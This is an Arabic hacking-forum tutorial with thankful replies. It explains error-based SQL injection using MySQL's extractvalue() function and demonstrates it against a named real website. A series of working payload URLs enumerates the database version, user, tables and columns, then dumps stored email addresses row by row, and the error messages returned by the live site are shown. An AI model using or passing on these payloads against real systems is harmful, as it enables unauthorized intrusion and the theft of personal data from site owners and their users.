Priv8 : SQLi using extractvalue()

Priv8 : SQLi using extractvalue()

[COLOR=Black]
[CENTER]
بسم الله الرحمن الرحيم

السلام عليكم ورحمة الله وبركاته

تحدثت سابقا عن الجيل الجديد من ثغرات
sql injection

شرح طرق اكتشافها بموضوعي السابق كان باضافة
كود PHP:

error.php?id=-10


قبل القيمة الرقمية
او بـ
كود PHP:

error.php?id=aaaaaaa’


والطريقة الثالثة
والتي لم اتطرق لها

كود PHP:

error.php?id=10.10.10.10




http://v4-team.com/cc/showthread.php?t=106507

ساتحدث اليوم عن احدى طرق الاستغلال الجديدة

ولكن قبل هذا اشكر
الاخ العيد محمد
على معلوماته القيمه

واشكر الاخ Dexter

على مساعدته ليا في البحث عن هدف , للشرح

قبل انا ابدا بالتطرق الى الموضوع

كل انسان يشاهد هذا الشرح عليه معرفة وظيفة هذا الامر
limit
والذي لا يعلم عليه الاعتماد على قوقل في فهم

هذا الامر لاننه سيكون مهم بالنسبة لنا في هذا الشرح

لاننا سنتعمد على دالة
extractvalue()

من شروط الاستغلال عن طريق هذه الدالة ان تكون قاعدة البيانات

تدعم دالة
extractvalue()
والقواعد التي اصدارها

اكثر من 5.1

واعلى تدعم هذه الدالة

مزايا طريقة الحقن هذه :

سنستغنى عن
union

ولن نظطر الى تحديد
select
1,2,3,4,5

وعدة مزايا اخرى اتركها لكم لتكتشفوها

قبل شرح الاستغلال

وجدت استخدام هذه الدالة في مصدر اجنبي

واستطعت الحقن بها وتطوير طريقة الحقن

ابحث بقوقل وستجد المصدر الاجنبي وطريقة حقنه

وطريقة الحقن التي قمت بتطويرها …

الهدف:

كود PHP:

http://www.sientries.co.uk/event.php?event_id=460


الاستغلال لاستخراج اليوزر واسم القاعدة واصدار القاعدة
كود PHP:

http://www.sientries.co.uk/event.php?event_id=460 and extractvalue(rand(),concat(0x3a,version(),0x3a,user()))–


اذا دخلت ولم تظهر لك المعلومات بسرعه قم بالولوج على هذا الرابط
كود PHP:

http://www.sientries.co.uk/event.php?event_id=460


وستجد المعلومات ظهرت …
امامك

كود PHP:

XPATH syntax error: ‘:5.5.9-log:sientries@localhost’.


شرح فيديو بسسيط

http://www.youtube.com/watch?v=d5STw7ZdGWs

مثال لاستخراج بيانات:
كود PHP:

http://www.sientries.co.uk/event.php?event_id=460 and extractvalue(rand(),concat(0x3a,(select concat(0x3a,table_name) from information_schema.tables limit 85,1)))–


كود PHP:

Error: XPATH syntax error: ‘::evt_special_fee_items’.





ووللحصول على الجدول الذي يليه
limit 86,1
وهكذا

حاولت الاستغناء عن الامر
limit
بتبديله بالامر
group_concat

ولكن يبدو ان عدد المخرجات محدد …

الاستغلال:
كود PHP:

http://www.sientries.co.uk/event.php?event_id=460 and extractvalue(rand(),concat(0x3a,(select group_concat(0x3a,table_name) from information_schema.tables)))–


كود PHP:

Error: XPATH syntax error: ‘::CHARACTER_SETS,:COLLATIONS,:CO’.


لنستخرج الان معنأ
الجداول الا تحتويها قاعدة بيانات
sientries
الجدول الاول
bof_email

كود PHP:

http://www.sientries.co.uk/event.php?event_id=460 and extractvalue(rand(),concat(0x3a,(select concat(0x3a,table_name) from information_schema.tables+where+table_schema%20=database() limit 1,1)))–


كود PHP:

Error: XPATH syntax error: ‘::bof_email’.


باقي الجداول
كود PHP:

http://www.sientries.co.uk/event.php?event_id=460 and extractvalue(rand(),concat(0x3a,(select concat(0x3a,table_name) from information_schema.tables+where+table_schema%20=database() limit 2,1)))–


كود PHP:

http://www.sientries.co.uk/event.php?event_id=460 and extractvalue(rand(),concat(0x3a,(select concat(0x3a,table_name) from information_schema.tables+where+table_schema%20=database() limit 3,1)))–


وهكذا …

حسنا بعد استخراجنا للجدول
bof_email

علينا استخراج الاعمدة التي يحتويها

بهذا الامر

كود PHP:

http://www.sientries.co.uk/event.php?event_id=460 and extractvalue(rand(),concat(0x3a,(select concat(0x3a,column_name)+from+information_schema.columns+where+table_name=‘bof_email’ limit 1,1)))–


كود PHP:

Error: XPATH syntax error: ‘::email_address’.


العمود الاول
email_address

العمود الثاني

كود PHP:

http://www.sientries.co.uk/event.php?event_id=460 and extractvalue(rand(),concat(0x3a,(select concat(0x3a,column_name)+from+information_schema.columns+where+table_name=‘bof_email’ limit 2,1)))–


bof_no

بعد ان استخرجنا الجدول
bof_email
واردنا الاعمدة التي بداخلها
email_address
,
bof_no

بقي لنا استخراج البيانات
التي يحتويها الجدول والاعمدة

ستكون بالطريقة التالية

كود PHP:

http://sientries.co.uk/event.php?event_id=460 and extractvalue(rand(),concat(0x3a,(select concat(0x3a,email_address,0x3a,bof_no) from bof_email limit 1,1)))–


ولاستخراج العضو الذي يليه

كود PHP:

http://sientries.co.uk/event.php?event_id=460 and extractvalue(rand(),concat(0x3a,(select concat(0x3a,email_address,0x3a,bof_no) from bof_email limit 2,1)))–


وهكذا

تم بحمد الله شرح الدالة وطريقة استخراج البيانات منها

برنامج الهافيج جميل ولكن هل يستطيع استخراج بيانات الموقع

الذي طرحته اما انه
سيكتفى بعلامة الاستفهام …

[/CENTER]
[/COLOR]

شكرا على نقل بالقليل نظم موضوع و وضعوا في قسم المناسب … تم نقل
و بالتوفيق…

شكرا يا ذيبببب

جزاك الله خير لكن havij pro راح يجيبه

يعطيك الف عافيه
ومثل مقال الفوكس البرو راح يجيبه .

شكرا لكـ

يعطيك الف عافيه